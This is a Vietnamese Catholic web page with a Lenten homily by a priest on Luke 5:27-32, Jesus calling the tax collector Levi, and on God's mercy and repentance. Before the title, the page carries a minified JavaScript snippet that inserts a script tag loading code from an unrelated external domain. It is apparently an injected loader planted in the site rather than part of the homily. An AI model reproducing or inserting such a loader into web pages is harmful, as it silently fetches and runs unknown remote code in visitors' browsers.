;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ĐỨC GIÊSU KÊU GỌI ÔNG LÊVI – Xitô PS

ĐỨC GIÊSU KÊU GỌI ÔNG LÊVI

ĐỨC GIÊSU KÊU GỌI ÔNG LÊVI

Thứ Bảy Lễ Tro: Lc 5, 27- 32

 

Phụng vụ Lời Chúa hôm nay đã chọn đoạn Tin Mừng theo thánh Luca ( Lc 5,27-32) tường thuật việc Đức Giêsu kêu gọi ông Lêvi thu thuế để trình bày cho chúng ta về lòng thương xót của Thiên Chúa đối với tội nhân để khích lệ chúng ta là những người có tội biết trông cậy vào Thiên Chúa tình thương với lòng sám hối ăn năn: “Hoán cải và vui mừng”: Phải đổi đời và thực thi cuộc biến đổi này trong hân hoan hy vọng!

“Đức Giêsu đi ra và trông thấy một người thu thuế tên là Lê-vi đang ngồi ở trạm thu thuế”.

Người thu thuế là hạng người bị dân chúng khinh dể và chê ghét vì cộng tác với ngoại bang và vì những hành vi xách nhiễu của hạng người này đối với dân chúng.

Tin Mừng cũng liên kết hai từ “những người thu thuế” và “những người tội lỗi”, gần đồng nghĩa với từ “kẻ bóc lột công khai” ngày nay (x. Lc 5,30 ; 7,34 ; 15,1-2 ; 19,7).

Lêvi chắc là người giàu có : Trước khi làm đầy công quĩ nhà nước, ông đã lợi dụng sự đóng góp của dân tộc nhỏ bé làm nặng trĩu túi riêng?

Lêvi theo Tin Mừng Mt 9,9 cũng gọi là Matthêu.

“Ngài bảo ông: “ Anh hãy theo tôi!””

Đức Giêsu không đi sâu vào trong các giai cấp đã được phân hạng. Ngài dám chọn một trong các người tội lỗi bị khinh thường làm Tông đồ. Ngài mời gọi ông đổi đời! Quả là một biến cố nghịch thường! Thái độ đáp ứng của ông cũng nghịch thường không kém!

“Ông bỏ tất cả, đứng dậy đi theo Ngài”

Một lời mời gọi. Một sự đáp trả thật dứt khoát và mau mắn với tất cả tin tưởng phó thác và hân hoan!

Quả thế,  để bày tỏ niềm vui trong ơn gọi mới quá to lớn và bất ngờ! Một cuộc đổi đời đầy ý nghĩa tràn trề hạnh phúc khôn xiết kể! “ Ông Lêvi làm tiệc lớn để thết đãi Đức Giêsu và các môn đệ Chúa. Có đông đảo người thu thuế và những người khác cùng ăn với các ngài, và cả những khách không được mời cũng có mặt”. Nói thế chắc hẳn không lầm! Vì Tin Mừng có nói : “ Những người Pharisêu và những Kinh sư thuộc nhóm của họ mới lẩm bẩm kêu trách các môn đệ Đức Giêsu rằng: “Sao các ông lại ăn uống với bọn thu thuế và quân tội lỗi!”” (Lc 5,30).

Họ dành thời giờ để làm việc đó…để đả kích, than vãn, phàn nàn và kêu trách hằn học như vậy…

Vâng, nhãn hiệu khinh bỉ đã được dán lên “bọn thu thuế và quân tội lỗi”!

Rõ ràng, điều cốt yếu trong tôn giáo của họ là: Phòng giữ mình, tách biệt, lên án người khác cách thành kiến và khinh miệt…

“Đức Giêsu đáp lại họ rằng: “ Người khỏe mạnh không cần Thầy thuốc, người đau ốm mới cần. Tôi đến không phải để kêu gọi người công chính, nhưng để kêu gọi người tội lỗi sám hối ăn năn”” ( Lc 5, 31-31).

Quả thực, Đức Giêsu đã kêu gọi ông Lêvi một người mà dân DoThái cũng như các đầu mục, họ coi là bất xứng vì ở trong hàng ngũ những người tội lỗi! Điều này chứng tỏ Đức Giêsu đã không phân biệt đối xử, không thành kiến. Thứ đến, Đức Giêsu đã dùng bữa với nhiều người thu thuế và phường tội lỗi, điều này chứng tỏ rằng Ngài hòa mình với mọi người, gạt bỏ mọi ngăn cách để có thể tiếp xúc với mọi người…

Sau nữa, Ngài tự ví mình như Thầy Thuốc đối với bệnh nhân và là Đấng Cứu Độ mọi người dương thế: “Tôi không đến để kêu gọi người công chính, mà để kêu gọi người tội lỗi sám hối ăn năn”.

Khi nhận biết mình hèn kém, yếu đuối, tội lỗi, chúng ta cảm thấy cần đến Chúa và nhờ đó, chúng ta biết lắng nghe tiếng Chúa để đến với Chúa qua Bí tích Hòa Giải để được ơn tha thứ, cứu độ và bình an.

Vậy, mỗi người chúng ta trong tâm tình Mùa Chay, hãy nhìn ngắm mẫu gương sống ơn kêu gọi của ông Lêvi để xác định và thực tình sống ơn Chúa gọi mình, đặc biệt ơn gọi sám hối canh tân của Mùa Chay Thánh!

Lm Phêrô Khoa Lê Trọng Ngọc

You May Also Like

Trả lời

X